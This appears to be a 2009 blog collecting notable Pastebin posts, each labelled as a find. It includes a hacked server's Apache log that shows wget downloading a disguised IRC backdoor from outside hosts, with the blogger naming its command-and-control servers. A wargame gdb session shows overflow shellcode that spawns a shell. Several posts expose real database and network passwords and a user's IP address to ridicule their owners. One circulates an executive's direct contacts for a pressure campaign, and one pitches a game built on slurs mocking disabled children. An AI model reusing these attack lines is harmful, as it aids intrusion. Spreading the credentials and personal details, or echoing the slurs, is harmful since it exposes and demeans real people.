21st century syndrome

Posted by Tim McCormack on Sat 25 Jul 16:16

1. You could be suffering from early 21st century syndrome.
2.  
3. You should be happy. You have fulfilled the requirements of a media-driven life. You have your own place. You have a "decent" job. You have a woman. And yet, underneath it all, there is this dissatisfaction. You can't quite place it, but it is there nonetheless, gnawing in your brain.
4.  
5. You flick randomly through internet pages for hours after dark. The TV chatters in the background. Every world developement is known to you a few minutes after it happens. You are the master of an external world that appears and presents itself through text and pics and vids.
6.  
7. You go about the business of living as it has been described to you and you can check all the boxes for relative success. And yet it doesn't feel like success. Not the way it does in the movies or on TV. No orchestral music chimes in when you do something good, no ominous montage depicts things negatively when your performance is not up to par. Life itself is removed from you because consciousness itself does not match up to the way "we" are used to receiving information; that of third person observer through a cam. The first-person view is somehow limiting: It limits us to this space and time, which is not in keeping with how consciousness can effortlessly cross time when "connected" to the internet.
8.  
9. Life today in a modern industrial society has an air of rigidness about it. Everywhere you go, you run up against barriers and rules. Speed limits, parking restrictions, decorum, social rules (unwritten but bearing on the mind), myriad exacting laws. All of them supposedly designed for the collective benefit of everyone. But no individual feels like everyone, each individual feels like you. So you end up being oppressed by the collective rules designed to protect you. This is called the "system".
10.  
11. There is nothing "wrong" with you, brother.
12.  
13. You are merely suffering from the collective malaise of having all that we are supposed to want. Supposedly, human existence today is the best it has ever been. The facts bear this out. Life expectancy today for the average person is higher than it's ever been, right?
14.  
15. And yet you long for the hunt. The risk. The hunter-gatherer life, buried deep somewhere in your hypothalamus, longs for that time when your own ingenuity resulted in food for your group. When you could exploit your human genius for real and direct gain... feeding yourself and your tribe. Going to the office today gains you money to obtain these things. But it does not offer the thrill of the hunt. The risk. The adrenaline rush of the successful raid on the enemy camp, the high of the perfect kill.
16.  
17. *Homo sapiens sapiens* is not a very old species in relative terms. But it is a cunning one and the greatest force this planet has ever seen. But, the amount of time we successfully gathered as hunters (2 million years) is far longer and evolutionary significant in comparison to the existence of human civilisation (8 thousand years). Yet, all cogent information tells you you are better off today than anyone in human history.
18.  
19. And yet, on a quiet walk outside the city, you stare at the moon through leafy glade and can almost touch the truth of a different life. A life you were designed for but no longer is.
20.  
21. There is nothing wrong with you, brother, that is not wrong with all of us.

The paste: http://pastebin.com/f671eaf65

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

yet another mysql login

Posted by Anonymous on Fri 24 Jul 19:53 (modification of post by

1. <?php
2.  
3. //Set our script to use $['INFO'] tags.
4. include "conf_global/multiforums.config.inc.php";
5.  
6. //Define our database connections
7. $host = "localhost";
8. $user = "ipbtest_ipb";
9. $pass = "cono1616";
10. $db = "ipbtest_ipb";
11.  
12. //Open the database connection
13. mysql_connect($host ,$user, $pass);
14. //Which database to use
15. mysql_select_db($db);
16.  
17. //Set our variables.
18. $boardurl = $INFO['freeforum_board_access_name'];
19. //Start our query
20. $res = mysql_query("SELECT * FROM `multiforums_forums` WHERE `access_name` = '".$boardurl."'");
21. //Go get the rows
22. $row = mysql_fetch_assoc($res);
23.  
24. //What if
25.  
26. if($row['adsDisabled'] == 0){
27.   echo "<center><script type='text/javascript'><!--
28. google_ad_client = 'pub-8664046583357847';
29. /* GeekBoads Forum Ads */
30. google_ad_slot = '3884588789';
31. google_ad_width = 728;
32. google_ad_height = 90;
33. //-->
34. </script>
35. <script type='text/javascript'
36. src='http://pagead2.googlesyndication.com/pagead/show_ads.js'>
37. </script></center>";
38.  
39. }else{
40.  
41.  
42. }
43.  
44.  
45. ?>

The paste: http://php.pastebin.com/m3b3e75e4

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

4chan vs AT&T

Looks like theres a mutiny in the works, most likely in regards to recent developments suggesting that AT&T is blocking 4chan [reddit].

Posted by david on Mon 27 Jul 01:30

1. AT&T CEO contact info:  Randall Stephenson, AT&T CEO rs2982@att.com (direct) randall.stephenson@att.com phone: 210-351-5401 (direct to his secretary) fax 210-351-3553 alternate phone: 210-821-4105 (headquarters, press 3, ask for Mr. Stephenson's office) 175 E. Houston San Antonio, TX 78205

The paste: http://pastebin.com/m63b201b8

Posted by Anonymous on Mon 27 Jul 01:31 (modification of post by

1. AT&T CEO contact info:  Randall Stephenson, AT&T CEO rs2982@att.com (direct) randall.stephenson@att.com phone: 210-351-5401 (direct to his secretary) fax 210-351-3553 alternate phone: 210-821-4105 (headquarters, press 3, ask for Mr. Stephenson's office) 175 E. Houston San Antonio, TX 78205
2.  
3. lol

The paste: http://pastebin.com/m3c1e482a

Posted by Anonymous on Mon 27 Jul 01:36 (modification of post by

1. AT&T CEO contact info:  Randall Stephenson, AT&T CEO rs2982@att.com (direct) randall.stephenson@att.com phone: 210-351-5401 (direct to his secretary) fax 210-351-3553 alternate phone: 210-821-4105 (headquarters, press 3, ask for Mr. Stephenson's office) 175 E. Houston San Antonio, TX 78205
2.  
3. Customer support: 1-800-331-0500
4.  
5. Customer sales: 1-888-333-6651
6.  
7. Chat: http://mibbit.com/chat/#save/b/@irc.rizon.net

The paste: http://pastebin.com/m1d09b714

Posted by Anonymous on Mon 27 Jul 01:43 (modification of post by

1. AT&T CEO contact info:
2.  
3. Randall Stephenson
4. rs2982@att.com
5. andall.stephenson@att.com
6. phone: 210-351-5401 (direct to his secretary)
7. fax 210-351-3553
8. alternate phone: 210-821-4105 (headquarters, press 3, ask for Mr. Stephenson's office)
9. 175 E. Houston
10. San Antonio, TX 78205
11.  
12. Company contact information:
13.  
14. Customer support: 1-800-331-0500
15. Customer sales: 1-888-333-6651
16.  
17. Discussion:
18.  
19. Chat: http://mibbit.com/chat/#save/b/@irc.rizon.net

The paste: http://pastebin.com/m2f636924

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

Possible linux local kernel exploit

A kernel oops, caused by a process named exploit always seems a bit fishy to me...

Posted by Anonymous on Sat 25 Jul 16:07

1. [1882089.868439] Oops: 0000 [#2] SMP
2. [1882089.868487] last sysfs file: /sys/devices/platform/w83627ehf.656/cpu0_vid
3. [1882089.868537] CPU 1
4. [1882089.868580] Modules linked in: fuse iptable_filter ip_tables x_tables kvm_intel kvm tun bitrev nfsd lockd nfs_acl auth_rpcgss sunrpc ipv6 w83627ehf hwmon_vid coretemp ehci_hcd uhci_hcd asus_atk0110 usbcore evdev i2c_i801 atl1e hwmon pata_marvell i2c_core processor thermal button crc32 thermal_sys sha256_generic ansi_cprng chainiv crypto_wq rng sata_sil24 ahci xfs exportfs libata sd_mod raid456 async_xor async_memcpy async_tx xor raid6_pq md_mod dm_crypt cbc aes_x86_64 cryptomgr pcompress aead crypto_blkcipher crypto_hash aes_generic crypto_algapi crypto
5. [1882089.869103] Pid: 20266, comm: exploit Tainted: G      D    2.6.30-gentoo-r1 #1 P5Q
6. [1882089.869191] RIP: 0010:[<0000000000400ed5>]  [<0000000000400ed5>] 0x400ed5
7. [1882089.869243] RSP: 0018:ffff8800142dfda8  EFLAGS: 00010282
8. [1882089.869290] RAX: ffffffff0087e9fe RBX: ffff88003aa00ca8 RCX: 0000000000000002
9. [1882089.869377] RDX: ffffffff0087e9fe RSI: 00000000004013e8 RDI: ffffffff8026e9d7
10. [1882089.869463] RBP: ffff8800142dfdd8 R08: 00000000004013e8 R09: 0000000000000000
11. [1882089.869548] R10: ffffffff8026e9d7 R11: 00007f3e788314a0 R12: 00000000ffffffea
12. [1882089.869634] R13: ffff88003aa00cb0 R14: ffff88003aa00540 R15: 0000000000000001
13. [1882089.869719] FS:  00007f3e78d176f0(0000) GS:ffff880028038000(0000) knlGS:0000000000000000
14. [1882089.869816] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
15. [1882089.869872] CR2: ffffffff0087e9fe CR3: 00000000780e5000 CR4: 00000000000026e0
16. [1882089.869964] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
17. [1882089.870060] DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400
18. [1882089.870149] Process exploit (pid: 20266, threadinfo ffff8800142de000, task ffff88010c1a1980)
19. [1882089.870248] Stack:
20. [1882089.870290]  ffff88003aa00540 ffff880062a88540 00007f3e78d25000 ffff88003aa00cb0
21. [1882089.870346]  0000000000000000 ffffffff8026e9d7 ffff8800142dfea8 ffffffff802cb700
22. [1882089.870445]  ffff880062a88540 0000000000000000 0000000000000000 0000800078b08e10
23. [1882089.870578] Call Trace:
24. [1882089.870626]  [<ffffffff8026e9d7>] ? prepare_kernel_cred+0xf7/0x120
25. [1882089.870680]  [<ffffffff802cb700>] mmap_region+0x3b0/0x570
26. [1882089.870742]  [<ffffffff802cc4d9>] do_mmap_pgoff+0x3f9/0x420
27. [1882089.870793]  [<ffffffff805253ae>] ? __down_write+0x1e/0x40
28. [1882089.870854]  [<ffffffff8021208e>] sys_mmap+0x12e/0x160
29. [1882089.870924]  [<ffffffff8020c32b>] system_call_fastpath+0x16/0x1b
30. [1882089.870994] Code:  Bad RIP value.
31. [1882089.871051] RIP  [<0000000000400ed5>] 0x400ed5
32. [1882089.871120]  RSP <ffff8800142dfda8>
33. [1882089.871175] CR2: ffffffff0087e9fe
34. [1882089.871252] ---[ end trace cbcf602abd84bf51 ]---

The paste: http://pastebin.com/mb3da83

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

Alaskan whistleblower

Posted by puro on Wed 22 Jul 21:42

1.  
2. FOR PUBLICATION
3.  
4.  
5.          IN the last several weeks there has been an extremely high amount of attention being paid to the Inspector generals
6. investigation of NOAAS National Marine Fisheries Service enforcement tactics in massachucetts, North carolina, and other east
7. coast states I would like to bring to the surface what I believe to be a coverup by the NMFS and NOAA in ALASKA
8.          In the fall of 2006 I contacted the NMFS enforcement in Alaska and informed them that I had wittnessed a very prominent
9. and politically connected Alaskan break state and federal laws dozens of times and where they could find the witnesses
10. and evidence to prove my claims.they followed up one accusation about illegal fish being brought in on his boat
11. and they did find illegal fish.they then closed the investigation and ignored my claims of falsifying federal documents
12. fishing in illegal areas,illegal transfers of quota share licenses and many other crimes including one that would
13. carry a penalty of including forfiture of quota shares of $286,000,but nmfs enforcement closed the case with out asking one
14. crew member a question...The equivalent of giving a bank robber a ticket for double parking and forgetting the robbery
15. It seems that if your a friend of management you can get away with 10 times more than a fish auction in Mass.
16. I do'nt know if it was a political favor for a friend or if it proved to be to big of a political embarrassment
17. What I do know he is still very much a friend to the most powerfull people at NOAA and NMFS and many in the halls of
18. Washington DC...Because of the unprofessional, unethical,and incompetent actions of nmfs enforcement many of the accusations
19. are now protected by the statute of limitations...I HOPE THE I G's office looks into my complaint made on line about the
20. 2006 investigation...

The paste: http://pastebin.com/m51bca358

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

stop stalking pastebin

Posted by Anonymous on Wed 22 Jul 16:24

1. stop stalking pastebin, these are my passwords!

The paste: http://pastebin.com/m1741abc4

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

hacked server Apache log

Thanks to ezgranny420 for posting nearly 3500 lines of this apache log file showing what appears to be a successful hack of a webserver. At line 3162 you'll notice the output of a successful wget of a file named mbot.jpg. This file is actually not an image, but instead a tarball containing what appears to be a backdoor that communicates over IRC. For the curious, a quick examination shows the following interesting servers and channels:

SERVER eu.undernet.org 6667
SERVER us.undernet.org 7000
SERVER 161.53.178.240 6667

CHANNEL #wh-ro

Posted by ezgranny420 on Wed 22 Jul 21:45

1. [Tue Apr 28 20:21:44 2009] [notice] SELinux policy enabled; httpd running as context root:system_r:httpd_t
2. [Tue Apr 28 20:21:44 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
3. [Tue Apr 28 20:21:45 2009] [notice] Digest: generating secret for digest authentication ...
4. [Tue Apr 28 20:21:45 2009] [notice] Digest: done
5. [Tue Apr 28 20:21:45 2009] [notice] mod_python: Creating 4 session mutexes based on 256 max processes and 0 max threads.
6. [Tue Apr 28 20:21:45 2009] [notice] Apache configured -- resuming normal operations
7. [Tue Apr 28 20:24:32 2009] [notice] caught SIGTERM, shutting down
8. [Tue Apr 28 20:26:55 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
9. [Tue Apr 28 20:26:56 2009] [notice] Digest: generating secret for digest authentication ...
10. [Tue Apr 28 20:26:56 2009] [notice] Digest: done
11. [Tue Apr 28 20:26:57 2009] [notice] mod_python: Creating 4 session mutexes based on 256 max processes and 0 max threads.
12. [Tue Apr 28 20:26:57 2009] [notice] Apache configured -- resuming normal operations
13. [Tue Apr 28 22:00:01 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
14. [Tue Apr 28 22:00:13 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
15. [Tue Apr 28 22:13:14 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
16. [Tue Apr 28 22:27:44 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
17. [Tue Apr 28 22:34:05 2009] [notice] caught SIGTERM, shutting down

skip forward to line 3159...

3159. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
3160. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
3161. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
3162. --03:08:12--  http://members.lycos.co.uk/carbalano/mbot.jpg
3163. Resolving members.lycos.co.uk... 213.131.252.251
3164. Connecting to members.lycos.co.uk|213.131.252.251|:80... connected.
3165. HTTP request sent, awaiting response... 200 OK
3166. Length: unspecified [image/jpeg]
3167. Saving to: `mbot.jpg'
3168.  
3169.     0K .......... .......... .......... .......... .......... 94.0K
3170.    50K .......... .......... .......... .......... ..........  337K
3171.   100K .......... .......... .......... .......... .           316K=0.8s
3172.  
3173. 03:08:14 (174 KB/s) - `mbot.jpg' saved [144693]
3174.  
3175. ./start.sh: line 1: /#bin/bash: No such file or directory
3176. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
3177. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
3178. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
3179. --05:40:43--  http://w.ftp.sh/images/db/m.tar.gz
3180. Resolving w.ftp.sh... 125.206.123.67
3181. Connecting to w.ftp.sh|125.206.123.67|:80... connected.
3182. HTTP request sent, awaiting response... 200 OK
3183. Length: 142538 (139K) [application/x-gzip]
3184. Saving to: `m.tar.gz'
3185.  
3186.     0K .......... .......... .......... .......... .......... 35% 78.1K 1s
3187.    50K .......... .......... .......... .......... .......... 71%  291K 0s
3188.   100K .......... .......... .......... .........            100% 1.13M=0.8s
3189.  
3190. 05:40:45 (164 KB/s) - `m.tar.gz' saved [142538/142538]
3191.  
3192. tar: .m/start.sh: time stamp 2009-07-09 05:41:06 is 21 s in the future
3193. tar: .m/1: time stamp 2009-07-09 05:42:04 is 79 s in the future
3194. tar: .m: time stamp 2009-07-09 05:49:06 is 501 s in the future
3195. --05:41:19--  http://w.ftp.sh/images/db/m.tar.gz
3196. Resolving w.ftp.sh... 125.206.123.67
3197. Connecting to w.ftp.sh|125.206.123.67|:80... connected.
3198. HTTP request sent, awaiting response... 200 OK
3199. Length: 142538 (139K) [application/x-gzip]
3200. Saving to: `m.tar.gz'
3201.  
3202.     0K .......... .......... .......... .......... .......... 35% 75.2K 1s
3203.    50K .......... .......... .......... .......... .......... 71%  288K 0s
3204.   100K .......... .......... .......... .........            100% 1.13M=0.9s
3205.  
3206. 05:41:20 (160 KB/s) - `m.tar.gz' saved [142538/142538]
3207.  
3208. tar: .m/1: time stamp 2009-07-09 05:42:04 is 44 s in the future
3209. tar: .m: time stamp 2009-07-09 05:49:06 is 466 s in the future
3210. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3211. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3212. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3213. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3214. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3215. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3216. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3217. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3218. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
3219. [Thu Jul 09 21:22:08 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)

The paste: http://pastebin.com/m7122eed0

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

Because with us love, is like a yo-yo.

Posted by nick l on Sat 27 Jun 01:55

1. Let's face it babe, this is not the best.
2.  
3. We could do much better, just give it a rest.
4.  
5. It was fun well it lasted, but as the music played,
6.  
7. we lost sight of our goal and our hearts were led astray.
8.  
9. Believe me, I love you, don't lose sight of that, I just need more,
10.  
11. and you can't give me that.
12.  
13. It's not you it's me (cheesy, but I think it works), if I could I would change it,
14.  
15. and i have lost count of how many times I have made you cry, but baby this goal is
16.  
17. unreachable, not matter how hard we try.
18.  
19. -(CHORUS)-
20.  
21. I love you, I love you, believe me babe.
22.  
23. But both our hearts got away... believe me I would save us.... but it's not
24.  
25. worth the heartache.
26.  
27. -(END CHORUS)-
28.  
29. Every day I think of you, I feel so bad.
30.  
31. About how I left you, alone with a broken heart,
32.  
33. it seems that is the new fad.
34.  
35. While you're off wondering what went wrong
36.  
37. I'll be here acting as if I ever loved you.
38.  
39. Wo both let our hearts get away from us, and we
40.  
41. both took a piece of each other's hearts with us.
42.  
43. There's no need to explain.
44.  
45. I will never forget you, with all this pain.
46.  
47. -(CHORUS)-
48.  
49. I love you, I love you, believe me babe.
50.  
51. But we both let our hearts get away... believe me I would save us.... but it's not
52.  
53. worth the heartache.
54.  
55. -(END CHORUS)-
56.  
57. Don't act like nothing happened.
58.  
59. Because with romance comes confusion, and things become chaotic.
60.  
61. And baby I know both of us are lovesick.
62.  
63. So please baby just let go,
64.  
65. Because with us love, is like a yo-yo.
66.  
67. -(CHORUS)-
68.  
69. I love you, I love you, believe me babe.
70.  
71. But we both let our hearts get away... believe me I would save us.... but it's not
72.  
73. worth the heartache.
74.  
75. -(END CHORUS)-
76.  
77. -(CHORUS)-
78.  
79. I love you, I love you, believe me babe.
80.  
81. But we both let our hearts get away... believe me I would save us.... but it's not
82.  
83. worth the heartache.
84.  
85. -(END CHORUS)-
86.  
87. Come on let go.
88.  
89. My love, just let go.

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

IP address of Canadian security dood

This crazy Canadian forgot to remove his IP address out of the environment variables before he pasted his circa 1995 overflow attempt.

Posted by Anonymous on Sat 18 Jul 01:55

1. 0xbfffddeb:      "i686"
2. 0xbfffddf0:      ""
3. 0xbfffddf1:      ""
4. 0xbfffddf2:      ""
5. 0xbfffddf3:      ""
6. 0xbfffddf4:      ""
7. 0xbfffddf5:      ""
8. 0xbfffddf6:      ""
9. 0xbfffddf7:      "/levels/level8"
10. 0xbfffde06:      'A' <repeats 32 times>
11. 0xbfffde27:      'A' <repeats 13 times>, "BBBB"
12. 0xbfffde39:      "SHELLCODE=", '\220' <repeats 100 times>, "1�\215C\027�\2001�Rhn/shh//bi\211�RS\211�\v�\200"
13. 0xbfffdec6:      "SHELL=/bin/bash"
14. 0xbfffded6:      "TERM=xterm"
15. 0xbfffdee1:      "SSH_CLIENT=70.52.16.12 39289 22"
16. 0xbfffdf01:      "SSH_TTY=/dev/pts/1"
17. 0xbfffdf14:      "USER=level8"
18. 0xbfffdf20:      "COLUMNS=178"
19. 0xbfffdf2c:      "PATH=/usr/local/bin:/usr/bin:/bin:/usr/games"
20. 0xbfffdf59:      "MAIL=/var/mail/level8"
21. 0xbfffdf6f:      "_=/usr/bin/gdb"
22. 0xbfffdf7e:      "PWD=/levels"
23. 0xbfffdf8a:      "LINES=64"
24. 0xbfffdf93:      "HOME=/home/level8"
25. 0xbfffdfa5:      "SHLVL=1"
26. 0xbfffdfad:      "LOGNAME=level8"
27. 0xbfffdfbc:      "SSH_CONNECTION=70.52.16.12 39289 192.168.1.32 22"
28. 0xbfffdfed:      "/levels/level8"
29. 0xbfffdffc:      ""
30. 0xbfffdffd:      ""
31. 0xbfffdffe:      ""
32. 0xbfffdfff:      ""
33. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
34. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
35. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
36. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
37. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
38. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
39. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
40. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
41. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
42. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
43. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
44. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
45. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
46. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
47. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
48. ---Type <return> to continue, or q <return> to quit---q
49. Quit
50. (gdb) quit
51. The program is running.  Exit anyway? (y or n) y
52. level8@io:/levels$ gdb level8
53. GNU gdb 6.8-debian
54. Copyright (C) 2008 Free Software Foundation, Inc.
55. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
56. This is free software: you are free to change and redistribute it.
57. There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
58. and "show warranty" for details.
59. This GDB was configured as "i486-linux-gnu"...
60. (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "BBBB"'`
61. Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "BBBB"'`
62.  
63. Program received signal SIGSEGV, Segmentation fault.
64. 0x42424242 in ?? ()
65. (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "\x39\xde\xff\xbf"'`
66. The program being debugged has been started already.
67. Start it from the beginning? (y or n) y
68. Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "\x39\xde\xff\xbf"'`
69.  
70. Program received signal SIGSEGV, Segmentation fault.
71. 0xbfffded1 in ?? ()
72. (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "\x4d\xde\xff\xbf"'`
73. The program being debugged has been started already.
74. Start it from the beginning? (y or n) y
75. Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "\x4d\xde\xff\xbf"'`
76.  
77. Program received signal SIGSEGV, Segmentation fault.
78. 0xbfffded1 in ?? ()
79. (gdb)

The pastebin: http://pastebin.com/m5e005077

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

stupidest game idea ever

Posted by Anonymous on Tue 21 Jul 02:43

1. Ok, so, the game will be about a retarded kid avoiding zombies in 2d scroller style.
2.  
3. I already worked out a first level:
4. In an intro video you could have a shortbus crash, and then a zombie will come in and get stuck or something, and the kid will come up and do some retarded kid thing, and the zombie will do the same thing because it is a zombie, and the kid will get closer, and the zombie will snarl, and then the kid will jump back, and the level will start.  It is important that the game starts from a short bus crash site though.
5.  
6. The great thing is that we can use some stuff from Field Runner (the waving arms gave me the idea).  The waving arms could be matched with funny down syndrome faces, and you could have a pick and unlock faces feature (ike johnny knoxville in The Ringer).  The legs would have to have wacky movements too (each character could possibly have different ones, and you could even have a mix and match feature).
7.  
8. As far as actual gameplay, I was thinking of making it like Double Dragon, and have this game mode where you have to run through the levels nonstop, and just avoid stuff.  It would almost be like a "don't crash" game, and the kid would make funny noises/faces if he comes close to a danger or just randomly.  Emphasis would have to be on his determination, so he needs a determined face, and it would be funny if he ran off balance, with his arms flailing behind him.  It would also be cool if you could unlock weapons, or pieces of equipment.  A funny one would be a retard helmet, and while you have it on you run bent forward, like you are gonna ram your head into something, and you are protected from the next danger you might crash into.  One of the retarded kids also needs a leash like the one pictured in the attachment that just drags behind him or her.
9.  
10. Another cool feature would be teamplay, and you can have two retarded kids running around at a time.

The pastebin: http://pastebin.com/m74c90c84

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

immunity debugger script

Found an Immunity Debugger script on pastebin! FTW.

Posted by Anonymous on Fri 17 Jul 23:09

1. #!/usr/bin/env python
2.  
3. __VERSION__ = '0.1'
4.  
5. import immlib
6. import getopt
7.  
8. from immlib import MemoryProtection
9. from immutils import prettyhexprint
10.  
11. DESC= "Immunity PyCommand isexec"
12. USAGE = "!isexec address"
13.  
14. def usage(imm):
15.     imm.Log("!isexec")
16.     imm.Log(USAGE, focus=1)
17.  
18. def main(args):
19.     imm = immlib.Debugger()
20.    
21.     imm.Log(' '.join(["###", DESC, "###"]))
22.     if len(args) == 0:    
23.         imm.Log(USAGE, focus=1)    
24.         return USAGE
25.  
26.     addr = int(args[0], 16)
27.     imm.Log("Retrieving page information for %x" % addr)
28.     page = imm.getMemoryPagebyAddress(addr)
29.  
30.     if page == None:
31.         return "Invalid address: %x" % addr
32.  
33.     execute = False;
34.    
35.     for acc in [MemoryProtection["PAGE_EXECUTE"],
36.                 MemoryProtection["PAGE_EXECUTE_READ"],
37.                 MemoryProtection["PAGE_EXECUTE_READWRITE"],
38.                 MemoryProtection["PAGE_EXECUTE_WRITECOPY"]]:
39.         if acc == page.access:
40.             execute = True;
41.    
42.     if execute:
43.         imm.Log("Address %x, in page %x, is executable"% (addr, page.getBaseAddress()))
44.         return "%x is executable" % addr
45.     else:
46.         imm.Log("Address %x, in page %x, is not executable" % (addr, page.getBaseAddress()))
47.         return "%x is not executable" % addr
48.  
49. =========================
50.  
51. 0BADF00D  ### Immunity PyCommand isexec ###
52. 0BADF00D  Retrieving page information for 12ffd0
53. 0BADF00D  Address 12ffd0, in page 126000, is not executable
54.  
55. 0BADF00D  ### Immunity PyCommand isexec ###
56. 0BADF00D  Retrieving page information for 40133a
57. 0BADF00D  Address 40133a, in page 401000, is marked as executable

The pastebin: http://python.pastebin.com/mb25963a

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

shawnmstout's network password

Shawn wanted to share with the world his password for accessing his hard drive over the network...

Posted by Anonymous on Tue 21 Jul 03:14

1. //[CENSORED]/c /home/shawnmstout/ftp/c cifs auto,username=shawnmstout,password=myaol[CENSORED] 0 0
2. //[CENSORED]/desktop /home/shawnmstout/ftp/desktop cifs auto,username=shawnmstout,password=myaol[CENSORED] 0 0
3. //[CENSORED]/drobo /home/shawnmstout/ftp/drobo cifs auto,username=shawnmstout,password=myaol[CENSORED] 0 0

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

Everybody else is doing it....

Pastebin: the constant stream of people's mysql credentials.

Posted by Anonymous on Sat 18 Jul 01:54 (modification of post by

1.         db, error = mysql.connect("[CENSORED]servers.co.uk","killerss_youarem","aBiGJbuelZnKQxP87AUWYlBj9AG6in","killerss_you")
2. local host = "[CENSORED]servers.co.uk"
3. local username = "killerss_youarem"
4. local password = "aBiGJbuelZnKQxP87AUWYlBj9AG6in"
5. local database = "killerss_you"
6. local port = 3306
7.  
8. local persistant = true
9.  
10. require( "mysql" )
11.  
12. local db
13.  
14. fucntion DoQuery(query, type)
15.         local result, isok, err = mysql.query(db, query, type or mysql.QUERY_NUMERIC)
16.        
17.         if not isok and err == "" then isok = true end -- false positive
18.        
19.         if not isok then
20.                 Error(tostring(err))
21.                 return nil
22.         end
23.                
24.         return result
25. end
26.  
27. function Connect()
28.         if db then return db end -- Still connected
29.        
30.         db, err = mysql.connect(host, username, password, database, port)
31.         if db == 0 then
32.                 Error(tostring(err))
33.                 db = nil
34.                 return
35.         end
36.        
37.         return db
38. end
39.  
40. function Disconnect(force)
41.         if not db then return end -- Already disconnected
42.         if persistent and not force then return end -- Don't disconnect persistent
43.        
44.         local succ, err = mysql.disconnect(db)
45.         if not succ then
46.                 error(tostring(err))
47.         end
48.        
49.         db = nil
50. end
51. hook.Add("ShutDown", "SQLDisconnect", function() disconnect(true) end) -- Force closed on shutdown

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

have a story written!

Posted by Anonymous on Tue 22 Jul 02:25

1. have a story written!
2.  
